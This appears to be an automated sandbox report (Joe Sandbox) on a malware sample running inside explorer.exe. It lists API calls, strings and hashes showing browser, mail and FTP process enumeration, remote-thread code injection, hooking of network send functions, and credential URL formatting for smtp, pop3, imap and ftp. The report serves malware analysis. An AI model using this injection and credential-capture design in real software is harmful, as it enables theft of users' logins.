Part of subcall function 00192608: VirtualQuery.KERNEL32(00194434,?,0000001C), ref: 00192615

Part of subcall function 00192861: GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
Part of subcall function 00192861: RtlAllocateHeap.NTDLL(00000000), ref: 0019286B

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00191038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 0019106B
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00191074
GetCurrentProcessId.KERNEL32(?,00191010), ref: 0019107A
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001910DF
Process32First.KERNEL32(00000000,?), ref: 001910FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0019111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0019112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00191142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 00191156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00191166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0019117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0019118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 001911A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 001911B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 001911CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 001911DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 001911F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00191206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00191216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00191226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00191236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 00191246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00191256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00191266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00191276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001912B4
Process32Next.KERNEL32(00000000,00000128), ref: 0019130B
CloseHandle.KERNELBASE(00000000), ref: 0019131C
Sleep.KERNELBASE(000003E8), ref: 00191327

Strings

winscp.exe, xrefs: 001911FC
chrome.exe, xrefs: 00191138
microsoftedgecp.exe, xrefs: 001910D2, 00191160, 001912AE
thunderbird.exe, xrefs: 001911C0
iexplore.exe, xrefs: 00191124
thebat64.exe, xrefs: 001911AC
cuteftppro.exe, xrefs: 0019121C
smartftp.exe, xrefs: 001911E8
firefox.exe, xrefs: 00191114
flashfxp.exe, xrefs: 0019120C
mailmaster.exe, xrefs: 0019122C
0-vP,v, xrefs: 00191074
foxmail.exe, xrefs: 0019124C
opera.exe, xrefs: 0019114C
thebat32.exe, xrefs: 00191198
filezilla.exe, xrefs: 001911D4
alimail.exe, xrefs: 0019125C
thebat.exe, xrefs: 00191184
mailchat.exe, xrefs: 0019126C
outlook.exe, xrefs: 00191170
263em.exe, xrefs: 0019123C

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
String ID: 0-vP,v$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 2555639992-2153411049
Opcode ID: 419c1082673728165f2931612db5603ecb043fc737db21b5f6409b0d8f3174d2
Instruction ID: a5f2c5c6564a7a44ed586305d964b281ce1ba206a52308d483f52750a86250b1
Opcode Fuzzy Hash: 419c1082673728165f2931612db5603ecb043fc737db21b5f6409b0d8f3174d2
Instruction Fuzzy Hash: BF719030644306BBDF14EBB19C85E6F7BACBF45780B08052AFD51C3590EB35EA858A65

Function 001910A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00192861: GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
Part of subcall function 00192861: RtlAllocateHeap.NTDLL(00000000), ref: 0019286B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001910DF
Process32First.KERNEL32(00000000,?), ref: 001910FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0019111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0019112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00191142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 00191156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00191166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0019117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0019118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 001911A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 001911B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 001911CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 001911DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 001911F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00191206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00191216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00191226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00191236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 00191246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00191256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00191266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00191276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001912B4
Process32Next.KERNEL32(00000000,00000128), ref: 0019130B
CloseHandle.KERNELBASE(00000000), ref: 0019131C
Sleep.KERNELBASE(000003E8), ref: 00191327

Strings

winscp.exe, xrefs: 001911FC
chrome.exe, xrefs: 00191138
microsoftedgecp.exe, xrefs: 001910D2, 00191160, 001912AE
thunderbird.exe, xrefs: 001911C0
iexplore.exe, xrefs: 00191124
thebat64.exe, xrefs: 001911AC
cuteftppro.exe, xrefs: 0019121C
smartftp.exe, xrefs: 001911E8
firefox.exe, xrefs: 00191114
flashfxp.exe, xrefs: 0019120C
mailmaster.exe, xrefs: 0019122C
foxmail.exe, xrefs: 0019124C
opera.exe, xrefs: 0019114C
thebat32.exe, xrefs: 00191198
filezilla.exe, xrefs: 001911D4
alimail.exe, xrefs: 0019125C
thebat.exe, xrefs: 00191184
mailchat.exe, xrefs: 0019126C
outlook.exe, xrefs: 00191170
263em.exe, xrefs: 0019123C

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 3950187957-1680033604
Opcode ID: d53d79cdae5ced4badb0084cd9ca54226e53b89694f97a0f2f9bcc6b2697b76c
Instruction ID: dd50c6c8b0867a0391b6f0192ffb6123b6f0dbdb8cece8ab97d1f46ce9406e11
Opcode Fuzzy Hash: d53d79cdae5ced4badb0084cd9ca54226e53b89694f97a0f2f9bcc6b2697b76c
Instruction Fuzzy Hash: A4517371644306B7DF10EBB18D85E6F7BEC7F45780B48092AFD50C3080EB25EA458A76

Function 00197728 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000196000.00000040.80000000.00040000.00000000.sdmp, Offset: 00196000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_196000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2be49d4125d28c657fab866d90be754f290eef567463cc4c3d098e12333055a
Instruction ID: 63e313e7923441364e65d54262e97f9af54d2a254beb2ef95ab92c0820d26387
Opcode Fuzzy Hash: d2be49d4125d28c657fab866d90be754f290eef567463cc4c3d098e12333055a
Instruction Fuzzy Hash: B4512A71A6C3924FDF264AB8CC986B07BA0EF52320B1D0679C5E5CB3C6E7945C05C7A1

Function 00192861 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
RtlAllocateHeap.NTDLL(00000000), ref: 0019286B

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 9667384f5bf338b543b91f1caaf15b8184dcf9e13d516b7990944baf37c495ff
Instruction ID: 4ef6f030a5a87572e67b05cc0bf980f88e3bf74c5ee17faa0c20c2334d8280b0
Opcode Fuzzy Hash: 9667384f5bf338b543b91f1caaf15b8184dcf9e13d516b7990944baf37c495ff
Instruction Fuzzy Hash: 2CA012704001007FDD441BA0AC0FF053A28A740301F0401017119C4460896009CC8721

Non-executed Functions

Function 00191819 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00192608: VirtualQuery.KERNEL32(00194434,?,0000001C), ref: 00192615

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7591E800,microsoftedgecp.exe,?), ref: 0019184E
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00191889
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00191919
RtlMoveMemory.NTDLL(00000000,00193428,00000016), ref: 00191940
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00191968
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00191978
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00191992
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0019199A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001919A8
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001919AF
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 001919C5
GetProcAddress.KERNEL32(00000000), ref: 001919CC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001919E2
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00191A0C
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00191A1F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A26
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A2D
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00191A41
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00191A58
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A65
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A6B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00191A71
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00191A74

Strings

0-vP,v, xrefs: 00191910
microsoftedgecp.exe, xrefs: 0019181D
atan, xrefs: 001919BB
ntdll, xrefs: 001919C0
opera_shared_counter, xrefs: 0019198B

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: 0-vP,v$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
API String ID: 1066286714-2027951781
Opcode ID: 3f5d26df559f41feac0edeb41819c477bd4ed5ef7a63a96e58f82829ff0d1bc2
Instruction ID: 6bcdaa221e4a1e9746635c5fb640b3fb856c5c828f785a7efd461f8d19830190
Opcode Fuzzy Hash: 3f5d26df559f41feac0edeb41819c477bd4ed5ef7a63a96e58f82829ff0d1bc2
Instruction Fuzzy Hash: DE619C31605345BFDB10DF219C84E6BBBECEB88754F04061AF959D3291DB30DE848BA2

Function 0019263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0019265A
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00192672
lstrlen.KERNEL32(?,00000000), ref: 0019267A
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00192685
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0019269F
wsprintfA.USER32 ref: 001926B6
CryptDestroyHash.ADVAPI32(?), ref: 001926CF
CryptReleaseContext.ADVAPI32(?,00000000), ref: 001926D9

Strings

%02X, xrefs: 001926B0

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 0f4bc79ac44d20c47d57c83b6d776197985a0f04d618d3c5b7cd8b0f67e393e7
Instruction ID: 430a8dec1809ba7574a2df510e44f88d7d19584195c6bcf301136cb61b47713f
Opcode Fuzzy Hash: 0f4bc79ac44d20c47d57c83b6d776197985a0f04d618d3c5b7cd8b0f67e393e7
Instruction Fuzzy Hash: 111128B1900108BFDB119B99EC88EAEBFBCEB48741F144066FA25E2160D7718F91DB60

Function 00191B17 Relevance: 6.1, APIs: 4, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 00191B4E
LoadLibraryA.KERNEL32(?,00194434,00000000,00000000,75922EE0,00000000,00191910,?,?,?,00000001,?,00000000), ref: 00191B76
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00191BA3
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00191BF4

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 1283a22bf962da21ad6ad8ccb458b28e44182d45c094c08cda5e5b6df55b6261
Instruction ID: ea5c7eaea74f1fe8dbb3640dcdb1560465134cba520472ea822e2e4a4e9d0370
Opcode Fuzzy Hash: 1283a22bf962da21ad6ad8ccb458b28e44182d45c094c08cda5e5b6df55b6261
Instruction Fuzzy Hash: 83318E75700216BBCF28CF29C884B76B7E8BF15355B19456DE896C7600E731E885CBA0

Function 00191332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00192861: GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
Part of subcall function 00192861: RtlAllocateHeap.NTDLL(00000000), ref: 0019286B

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0019109E,?,00191010), ref: 0019134A
GetCurrentProcessId.KERNEL32(00000003,?,0019109E,?,00191010), ref: 0019135B
wsprintfA.USER32 ref: 00191372

Part of subcall function 0019263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0019265A
Part of subcall function 0019263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00192672
Part of subcall function 0019263E: lstrlen.KERNEL32(?,00000000), ref: 0019267A
Part of subcall function 0019263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00192685
Part of subcall function 0019263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0019269F
Part of subcall function 0019263E: wsprintfA.USER32 ref: 001926B6
Part of subcall function 0019263E: CryptDestroyHash.ADVAPI32(?), ref: 001926CF
Part of subcall function 0019263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 001926D9

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00191389
GetLastError.KERNEL32 ref: 0019138F
Sleep.KERNEL32(000001F4), ref: 001913A1

Part of subcall function 001924D5: GetCurrentProcessId.KERNEL32 ref: 001924E7
Part of subcall function 001924D5: GetCurrentThreadId.KERNEL32 ref: 001924EF
Part of subcall function 001924D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001924FF
Part of subcall function 001924D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0019250D
Part of subcall function 001924D5: CloseHandle.KERNEL32(00000000), ref: 00192566

GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 001913B8
GetProcAddress.KERNEL32(00000000), ref: 001913BF
GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 001913E4
GetProcAddress.KERNEL32(00000000), ref: 001913EB

Part of subcall function 00191DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00191E1D

RtlExitUserThread.NTDLL(00000000), ref: 0019141D

Strings

WSASend, xrefs: 001913DA
%s%d%d%d, xrefs: 0019136C
send, xrefs: 001913AE
ws2_32.dll, xrefs: 001913B3, 001913DF

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
String ID: %s%d%d%d$WSASend$send$ws2_32.dll
API String ID: 706757162-1430290102
Opcode ID: 0e96e4d402da3ada5d9879d61c48910d7cf2c2a69eba8b02fcc00329870ecf34
Instruction ID: eaa003837dd7768fabd62f8c29da6c75dcf0a091d2299c5f2329d49b538fae9c
Opcode Fuzzy Hash: 0e96e4d402da3ada5d9879d61c48910d7cf2c2a69eba8b02fcc00329870ecf34
Instruction Fuzzy Hash: 5C31A530740215BBCF106FA0DC0AFAF3BA9AF19B41F044025FA16976D1CF759A918B90

Function 00191647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00194220,?,?), ref: 00191679
lstrlen.KERNEL32(?), ref: 00191686
getpeername.WS2_32(?,?,?), ref: 001916A0
inet_ntoa.WS2_32(?), ref: 001916B1
htons.WS2_32(?), ref: 001916BF
wsprintfA.USER32 ref: 00191725

Strings

smtp://%s:%s@%s:%d, xrefs: 001916F3, 00191723
pop3://%s:%s@%s:%d, xrefs: 00191701
imap://%s:%s@%s:%d, xrefs: 001916FA
ftp://%s:%s@%s:%d, xrefs: 00191708

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
API String ID: 3379139566-1703351401
Opcode ID: 4639d6762da9eb29161be10fb4f654ae7fadb1c67a94c804d8964cfc41c41c64
Instruction ID: 3f197a3d48c1934a6146f5dbbd280962da1b805ed4a2ddaa55aad4c48cc2b5b9
Opcode Fuzzy Hash: 4639d6762da9eb29161be10fb4f654ae7fadb1c67a94c804d8964cfc41c41c64
Instruction Fuzzy Hash: CD21B836E0030B77DF195FFD8D885BE7AAEAB45741B084076E915E3251DB34CE819B50

Function 00191752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00191539,?,?,?,0019144B,?), ref: 00191763
GetProcAddress.KERNEL32(00000000), ref: 0019176A
RtlZeroMemory.NTDLL(00194228,00000104), ref: 00191788
RtlZeroMemory.NTDLL(00194118,00000104), ref: 00191790
RtlZeroMemory.NTDLL(00194330,00000104), ref: 00191798
RtlZeroMemory.NTDLL(00194000,00000104), ref: 001917A1

Strings

sscanf, xrefs: 00191755
%s%s%s%s, xrefs: 001917B3
ntdll.dll, xrefs: 0019175A

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: MemoryZero$AddressHandleModuleProc
String ID: %s%s%s%s$ntdll.dll$sscanf
API String ID: 1490332519-278825019
Opcode ID: d3fb27d6fa7b5c45b15c408c7c1136b55e8ca6696edb95804e80db8f6988478a
Instruction ID: 8509b05c3a538693cc1e048b94d6fbc728db2e3378f6d628bf84291dccbb7c35
Opcode Fuzzy Hash: d3fb27d6fa7b5c45b15c408c7c1136b55e8ca6696edb95804e80db8f6988478a
Instruction Fuzzy Hash: 71F03772B8033C37CD2023EA7C0AD5BBE5CDA55FEA3470162B614A3281DB967E4246F5

Function 001924D5 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 001924E7
GetCurrentThreadId.KERNEL32 ref: 001924EF
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001924FF
Thread32First.KERNEL32(00000000,0000001C), ref: 0019250D
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0019252C
SuspendThread.KERNEL32(00000000), ref: 0019253C
CloseHandle.KERNEL32(00000000), ref: 0019254B
Thread32Next.KERNEL32(00000000,0000001C), ref: 0019255B
CloseHandle.KERNEL32(00000000), ref: 00192566

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 53dc8c573811bb5414337dd4e9ea2e778125666fd558f106284fb6bbcce1ef2f
Instruction ID: c95944fbbb0772eeeb214c39e61bd8258c27f5404089ae2e97cda560528e3873
Opcode Fuzzy Hash: 53dc8c573811bb5414337dd4e9ea2e778125666fd558f106284fb6bbcce1ef2f
Instruction Fuzzy Hash: 081161B1504301EFEB119F60AC4CBAFBBB8FF85B01F09051AF652D2550D7318A899BA3

Function 00191F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00192861: GetProcessHeap.KERNEL32(00000008,0000A000,001910CC), ref: 00192864
Part of subcall function 00192861: RtlAllocateHeap.NTDLL(00000000), ref: 0019286B

Part of subcall function 001927E2: lstrlen.KERNEL32(001940DA,?,00000000,00000000,00191F86,75918A60,001940DA,00000000), ref: 001927EA
Part of subcall function 001927E2: MultiByteToWideChar.KERNEL32(00000000,00000000,001940DA,00000001,00000000,00000000), ref: 001927FC

Part of subcall function 00192374: RtlZeroMemory.NTDLL(?,00000018), ref: 00192386

RtlZeroMemory.NTDLL(?,0000003C), ref: 00191FE2
wsprintfW.USER32 ref: 0019211B
wsprintfW.USER32 ref: 00192186
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00192250

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 001921AA
Accept: */*Referer: %S, xrefs: 00192111
Host: %s, xrefs: 00192180
POST, xrefs: 001920CC

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: a28ca4de7b51a829e2b9df2b69b2007ba488650ef00ea6fa732f15fd7409ddf1
Instruction ID: 0efe6438fe9d8dac25567a101f4c83f60b08af148659c8a74cbd0ec27ae63ed2
Opcode Fuzzy Hash: a28ca4de7b51a829e2b9df2b69b2007ba488650ef00ea6fa732f15fd7409ddf1
Instruction Fuzzy Hash: 3FA15C71608305AFDB209F68D885A2FBBE8FB98740F14492DF995D3261DB70DE44CB62

Function 001925AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000400,00000000,?,7591E800,?,?,microsoftedgecp.exe,00191287), ref: 001925BF
IsWow64Process.KERNEL32(000000FF,?), ref: 001925D1
IsWow64Process.KERNEL32(00000000,?), ref: 001925E4
CloseHandle.KERNEL32(00000000), ref: 001925FA

Strings

microsoftedgecp.exe, xrefs: 001925AD

Memory Dump Source

Source File: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_191000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID: microsoftedgecp.exe
API String ID: 331459951-1475183003
Opcode ID: 46595439f91970b4cd8100fdcef5c3507c8c0fe17e1297d4a8351c4df5e33981
Instruction ID: 33981f2daf7a06d9867cac6980d3c26af43802a6108f0f4ebea86a7e4ad5295f
Opcode Fuzzy Hash: 46595439f91970b4cd8100fdcef5c3507c8c0fe17e1297d4a8351c4df5e33981
Instruction Fuzzy Hash: 8BF09071942218FFAB10CF919D89DEE776CEB01251B18026AF91492540D7314F44E6A0

Analysis Process: explorer.exePID: 4444, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 008C355C Relevance: 1.6, APIs: 1, Instructions: 73
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 008C35D8

Memory Dump Source

Source File: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 008C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8c1000_explorer.jbxd

Yara matches

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction ID: 1cc43d3dd04253da903f19f8390d63c83df3090efa2a4ca2da8b42232e047299
Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
Instruction Fuzzy Hash: CD11C430615E095FEF58BBBC989DB7937B0FB19302F54413EA419C76A1DA39CA41C741

Function 008C3220 Relevance: 7.7, APIs: 5, Instructions: 241
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 008C3266
Process32First.KERNEL32 ref: 008C3289
